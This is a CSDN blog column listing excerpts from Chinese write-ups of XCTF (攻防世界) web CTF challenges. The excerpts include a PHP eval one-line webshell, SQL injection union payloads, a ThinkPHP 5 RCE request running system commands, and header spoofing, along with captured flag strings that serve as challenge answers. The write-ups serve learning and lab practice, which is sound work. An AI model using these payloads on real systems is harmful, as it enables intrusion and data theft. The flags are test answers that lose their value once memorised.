![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF
码啊码
这个作者很懒,什么都没留下…
展开
-
PHP CTF常见考题的绕过技巧
1.===绕过PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。只要两边字符串类型不同会返回false原创 2022-04-07 12:31:54 · 11672 阅读 · 3 评论 -
攻防世界-web ics-05
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统逐个点击菜单栏,发现只有设备维护中心有跳转题目提示了利用后门入侵,首先使用dirsearch扫描网站目录,发现有个/index.php/login目录尝试访问,发现页面有超链接,尝试点击发现page的参数会原样输出尝试使用php伪协议读取文件:php伪协议参考:https://www.cnblogs.com/endust/p/11804767.html构造payload读取index.php..原创 2022-02-19 01:25:33 · 2398 阅读 · 0 评论 -
攻防世界-web shrine
代码分析:import flaskimport osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG') #flag的位置,需要查看的目标@app.route('/') #路由:解析url,访问/路径时就执行index()def index(): return open(__file__).read() #读取文件@app.route('/shrine/')def shrin...原创 2022-02-12 11:12:18 · 2341 阅读 · 0 评论 -
攻防世界-web easytornado
题目描述:Tornado 框架显示有3 个文件1.访问flag.txt文件提示flag在fllllllllllllag文件中2.访问welcome.txt文件,提示renderrender是一个Tomado框架的一个渲染函数,即可以通过传递不同的参数形成不同的页面,可能存在模板注入漏洞3.访问hints.txt文件,看到有个md5加密方法,再看请求的url发现每个url都带有filehash,应该就是filehash的加密公式根据url特征需要提供filename及.原创 2022-02-11 16:32:17 · 702 阅读 · 0 评论 -
攻防世界-web Web_python_template_injection
提示python模板注入随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入1.判断模板引擎:找到收藏已久的模板注入图首先从${7*7}开始测试:并没有执行继续测试{{7*7}}:执行成功,输出了49因为Twig是php的模板,所有可以确定模板为Jinja22.直接百度搜索Jinja2模板注入漏洞参考:https://blog.csdn.net/qq_36374896/arti...原创 2022-02-11 14:55:00 · 3330 阅读 · 0 评论 -
攻防世界-web upload1
文件上传绕过题通过查看页面代码发现是前端验证,直接找到F12打开控制台,把onchange="check();"删除掉,即可畅通无阻上传一句话木马文件<?php @eval($_POST['shy']);?>蚁剑连接连接成功,查找flag:cyberpeace{07e66ef9c0ed89f0dcdd9aa2fe999906}...原创 2022-02-11 12:55:19 · 712 阅读 · 0 评论 -
攻防世界-web unserialize3
结尾提示?code= 猜测通过code传入参数__wakeup()是魔术方法,经常用在反序列化操作中,unserialize()会检查是否存在一个__wakeup()方法。如果存在,则会先调用__wakeup方法,预先准备对象需要的资源。由题目代码可知只要触发了wakeup()方法就会执行exit()结束程序根据题目描述这是一道反序列化题,猜测操作查看flag的代码在xctf类中并且隐藏了没显示在前台,我们需要利用反序列化来调用xctf类,同时需要绕过wakeup()方法P...原创 2022-02-11 11:43:38 · 686 阅读 · 0 评论 -
攻防世界-web NaNNaNNaNNaN-Batman
解压附件得到web100文件用记事本打开是部分内容乱码的script代码修改文件名为web100.html,用浏览器打开是一个输入框和按钮,但是点击没有反应再回来看代码,发现结尾有个eval()函数,eval是执行函数;这里eval(_)执行了_变量中的内容,猜测乱码可能与这个函数有关,把eval修改为alert,浏览器访问,弹窗显示正常代码审计 function $(){ var e=document.getElementById("c").val..原创 2022-02-11 11:09:24 · 975 阅读 · 0 评论 -
攻防世界-web NewsCenter3
题目描述:如题目环境报错,稍等片刻刷新即可一、测试输入:1' 页面直接500输入:1' or 1 =1 # 页面正常显示使用:1' order by n # 测试地段数为3使用联合查询爆数据:-1' union select 1,2,3 #二、查看当前数据库名及数据库用户名-1' union select 1,database(),user() #三、查看表名:-1' union select 1,2,group_concat(table_name) f..原创 2022-02-11 10:15:37 · 1029 阅读 · 0 评论 -
攻防世界-web warmup
页面只有一个表情包,啥也没有首先查看一下源代码,发现有个source.php尝试访问,是一坨代码有个hint.php尝试访问,提示flag在ffffllllaaaagggg简单对代码进行分析: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { ...原创 2022-02-10 17:11:25 · 281 阅读 · 0 评论 -
攻防世界-web ics-06
题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。逐个点击菜单栏发现只有报表中心有内容简单选择几次日期查看无结果再看标题发现有id编号,尝试使用burpsuit抓包遍历id,看有没有隐藏信息在某个id中从1到10000检索flag隐藏在id=2333中cyberpeace{10102d853bf981adf9e3882331f52308}...原创 2022-02-10 14:49:01 · 138 阅读 · 0 评论 -
攻防世界-web supersqli
根据题目这是一道sql注入题输入1'测试,成功报错可以看到这是一个MariaDB数据库,MariaDB是MySQL的一个分支,与mysql大部分的用法都是一样的,只有一些参数,特性的不同1.使用order by来测试字段1' order by n #当order by 2显示正常,当order by 3报错,可以确定有两个字段2.使用联合查询1' union select 1,2 #提示对select等操作词语进行了正则过滤,尝试使用双写、/**/绕过无效...原创 2022-02-10 11:26:32 · 463 阅读 · 0 评论 -
攻防世界-web Web_php_include
根据题目这题应该要用到php文件包含分析代码:strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是区分大小写的)//例如:echo strstr("Hello world!","world"); // 输出 world!str_replace() 函数用法:替换字符串中的一些字符(区分大小写)//例如:echo str_replace("world","Peter","Hello world!"); //输出Hell原创 2022-02-10 10:15:04 · 1233 阅读 · 2 评论 -
攻防世界-web php_rce
一看页面是thinkphp v5版本,已知存在漏洞的,直接利用THinkPHP5.0漏洞参考:https://www.cnblogs.com/backlion/p/10106676.html读取文件目录:ls /http://111.200.241.244:56979/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/.原创 2022-02-09 16:20:58 · 115 阅读 · 0 评论 -
攻防世界-web Web_php_unserialize
根据题目这是一道反序列化题<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __w原创 2022-02-09 14:59:29 · 156 阅读 · 0 评论 -
攻防世界-web PHP2
an you anthenticate to this website?原创 2022-02-09 12:56:10 · 271 阅读 · 0 评论 -
攻防世界-web Training-WWW-Robots
使用 robots.txt 文件检查是否允许对您的网站或仅部分网站进行爬网和索引尝试访问robots.txt文件查看有没有信息泄露看到有一个fl0g.php文件,尝试访问得到flagcyberpeace{058a5f3d57e3dab6d0a13af3135bb92b}...原创 2022-02-09 11:17:45 · 81 阅读 · 0 评论 -
攻防世界-web baby_web
题目描述:想想初始页面是哪个根据题目描述,尝试浏览器直接访问index.php发现会直接跳转到1.php,通过burpsuit抓包访问,拦截index.php的请求包发送到重发器模块访问得到flagflag{very_baby_web}原创 2022-02-09 11:07:58 · 133 阅读 · 0 评论 -
攻防世界-web simple_js
题目描述:小宁发现了一个网页,但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} )随便输入一个密码,提示人造密码再查看一下题目叫简单的js,尝试禁用网站的js无果分析js代码<script type="text/javascript"> function dechiffre(pass_enc){ var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65";原创 2022-02-09 10:48:21 · 696 阅读 · 0 评论 -
攻防世界-web command_execution
题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。题目提示没有写waf,尝试命令执行发现flag文件在home目录下,查看flagcyberpeace{30e2dbfb68b11724e4f73f1b222a11b9}...原创 2022-02-09 09:56:08 · 527 阅读 · 0 评论 -
攻防世界-web webshell
题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。直接尝试用蚁剑连接连接成功,找到flagcyberpeace{becea3d09c5e643ea19022b803b16f4c}原创 2022-02-09 09:41:32 · 120 阅读 · 0 评论 -
攻防世界-web xff_referer
X老师告诉小宁其实xff和referer是可以伪造的。提示ip地址必须为123.123.123.123抓包添加X-Forwarded-For:123.123.123.12提交提示必须来自https://www.google.com添加referer:https://www.google.com提交得到flagcyberpeace{92b83a7ec8978f045a481f32772fc430}...原创 2022-02-09 09:32:47 · 532 阅读 · 0 评论 -
攻防世界-web get_post
X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗?这题就考get及post提交方法cyberpeace{676aefb99e9331bfa5d0f95926d684db}原创 2022-02-09 09:20:22 · 88 阅读 · 0 评论 -
攻防世界-web simple_php
题目描述:小宁听说php是最好的语言,于是她简单学习之后写了几行php代码1.绕过a0 and aa等于0并且a是TRUE,php是弱语言,在执行关系运算“”时要求运算符两边的数据类型必须一致,如果等号右边是字符串abc,会被强制转换为了整型0,但字符串是TRUE。http://111.200.241.244:63912?a=abc获得了一半的flag2.绕过b>1234b要大于1234,还有is_numeric过滤要求不能是数字和数字字符串,所以数字后面加字母就行:1345a获得f原创 2022-02-08 17:48:09 · 245 阅读 · 0 评论 -
攻防世界-web weak_auth
点击reset尝试注册账号,无跳转点击login提示使用admin登录再根据提示密码是随手设置的,猜测是弱口令,直接用burpsuit跑密码为123456,得到flagcyberpeace{230e9786038b73ffd61933b0d43f5223}原创 2022-02-08 17:22:04 · 90 阅读 · 0 评论 -
攻防世界-web disabled_button
尝试点击按钮和题目提示的一样点击不了F12打开控制台,直接把input标签的disable属性删除掉双击选中disable删除就行点击flag按钮得到flagcyberpeace{92563f76cf22ccd27c837841fcddfd0d}原创 2022-02-08 17:05:59 · 210 阅读 · 0 评论 -
攻防世界-web-cookie writeup
访问网站F12打开控制台输入document.cookie获取当前网站的cookie,提示存在cookie.php文件访问/cookie.php,提示查看response查看请求头得到flagcyberpeace{337c91c6dad7b0e423fd99edc59a5bd1}原创 2022-02-08 16:51:14 · 119 阅读 · 0 评论 -
攻防世界-web-backup
访问网站,提示备份文件直接访问/index.php.bak下载备份文件,用记事本打开得到flagCyberpeace{855A1C4B3401294CB6604CCC98BDE334}原创 2022-02-08 16:32:12 · 320 阅读 · 0 评论 -
攻防世界web-robots writeup
直接访问页面显示空白,查看源代码也没有东西,再看题目叫robots,直接访问/robots.txt看到有一个f1ag_1s_h3re.php文件,直接访问获得flag原创 2022-02-08 16:23:11 · 253 阅读 · 0 评论